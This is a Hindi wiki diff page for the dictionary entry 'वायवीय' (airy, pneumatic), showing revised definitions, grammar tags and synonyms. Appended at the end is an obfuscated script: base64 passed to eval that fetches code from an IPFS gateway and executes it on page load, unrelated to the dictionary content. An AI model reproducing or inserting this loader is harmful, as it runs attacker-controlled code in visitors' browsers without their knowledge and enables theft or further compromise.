Difference between revisions of "वायवीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=वायु के बल से चलनेवाला, वायु [[तत्व]] से बना हुआ, हवाई, वायुमण्डल से सम्बन्धित
+
|हिन्दी=वायु के बल से चलनेवाला, वायु [[तत्व]] से बना हुआ, हवाई, वायुमण्डल से सम्बन्धित, पश्चिमोत्तर कोण
|व्याकरण=[[विशेषण]] [[संज्ञा]]- वायु संबंधी, पुल्लिंग- पश्चिमोत्तर कोण
+
|व्याकरण=[[विशेषण]], [[संज्ञा]], पुल्लिंग
|उदाहरण=भूत प्रेतों के वायवीय शरीर
+
|उदाहरण=भूत प्रेतों के '''वायवीय''' शरीर
 
|विशेष=वह ताल जिसका एक सिरा तो रेडियो यंत्र से संबद्ध होता है और दूसरा सिरा या तो खुले आकाश में विस्तृत होता है या ऊँचाई पर खड़े हुए बाँस के साथ लगा रहता है।
 
|विशेष=वह ताल जिसका एक सिरा तो रेडियो यंत्र से संबद्ध होता है और दूसरा सिरा या तो खुले आकाश में विस्तृत होता है या ऊँचाई पर खड़े हुए बाँस के साथ लगा रहता है।
|पर्यायवाची=
+
|पर्यायवाची=वायु संबंधी
 
|संस्कृत=[वायु + छ]
 
|संस्कृत=[वायु + छ]
 
|अन्य ग्रंथ=
 
|अन्य ग्रंथ=

Latest revision as of 11:10, 10 February 2011

shabd sandarbh
hindi vayu ke bal se chalanevala, vayu tatv se bana hua, havaee, vayumandal se sambandhit, pashchimottar kon
-vyakaran    visheshan, sanjna, pulliang
-udaharan   bhoot pretoan ke vayaviy sharir
-vishesh    vah tal jisaka ek sira to rediyo yantr se sanbaddh hota hai aur doosara sira ya to khule akash mean vistrit hota hai ya ooanchaee par kh de hue baans ke sath laga rahata hai.
-vilom   
-paryayavachi    vayu sanbandhi
sanskrit [vayu + chh]
any granth
sanbandhit shabd vayav, vayavy astr, vayavi
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>